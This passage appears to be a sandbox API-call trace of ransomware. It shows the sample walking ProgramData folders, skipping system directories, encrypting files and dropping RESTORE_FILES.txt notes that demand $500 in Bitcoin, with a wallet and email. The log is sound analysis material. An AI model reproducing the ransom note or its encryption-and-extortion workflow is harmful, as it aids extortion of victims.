\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.042] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.043] lstrlenA (lpString="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") returned 684 [0066.043] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.043] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.043] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.043] CloseHandle (hObject=0xa4) returned 1 [0066.043] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="Windows") returned -1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="Program Files") returned -1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="Program Files (x86)") returned -1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="$Recycle.bin") returned 1 [0066.043] lstrcmpiW (lpString1="DRM", lpString2="System Volume Information") returned -1 [0066.043] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned 32 [0066.043] lstrcmpW (lpString1="DRM", lpString2=".") returned 1 [0066.043] lstrcmpW (lpString1="DRM", lpString2="..") returned 1 [0066.043] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*") returned 34 [0066.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.043] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.043] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.043] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.043] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\.") returned 34 [0066.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.044] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.044] lstrcmpiW 
(lpString1="..", lpString2="Program Files") returned -1 [0066.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\..") returned 35 [0066.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.044] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="Windows") returned -1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="Program Files") returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="Program Files (x86)") returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1="Server", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned 39 [0066.044] lstrcmpW (lpString1="Server", lpString2=".") returned 1 [0066.044] lstrcmpW (lpString1="Server", lpString2="..") returned 1 [0066.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*") returned 41 [0066.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.044] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0066.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.") returned 41 [0066.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.044] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0066.044] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0066.044] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\." (normalized: "c:\\programdata\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\..") returned 42 [0066.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.045] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0066.045] 
lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0066.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0066.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0066.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\programdata\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.045] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt") returned 57 [0066.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\drm\\server\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.045] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.045] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.046] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.046] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.046] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.046] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.046] CloseHandle (hObject=0xb4) returned 1 [0066.046] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.046] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.046] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\RESTORE_FILES.txt") returned 50 [0066.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\drm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.047] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.047] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.047] lstrlenA (lpString="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") returned 684 [0066.048] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.048] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.048] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.048] CloseHandle (hObject=0xa4) returned 1 [0066.048] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="Windows") returned -1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="Program Files") returned -1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="Program Files (x86)") returned -1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="$Recycle.bin") returned 1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="System Volume Information") returned -1 [0066.048] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned 34 [0066.048] lstrcmpW (lpString1="eHome", lpString2=".") returned 1 [0066.048] lstrcmpW (lpString1="eHome", lpString2="..") returned 1 [0066.048] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*") returned 36 [0066.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.048] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.048] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\.") returned 36 [0066.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.048] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 
[0066.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\..") returned 37 [0066.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.049] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned 39 [0066.049] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0066.049] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*") returned 41 [0066.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\.") returned 41 [0066.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.049] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\..") returned 42 [0066.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.049] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.049] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt") returned 57 [0066.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.050] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.050] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.050] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.050] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.051] CloseHandle (hObject=0xb4) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.051] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.051] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\RESTORE_FILES.txt") returned 52 [0066.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.192] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.199] lstrlenA (lpString="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") returned 684 [0066.199] WriteFile (in: hFile=0xa4, 
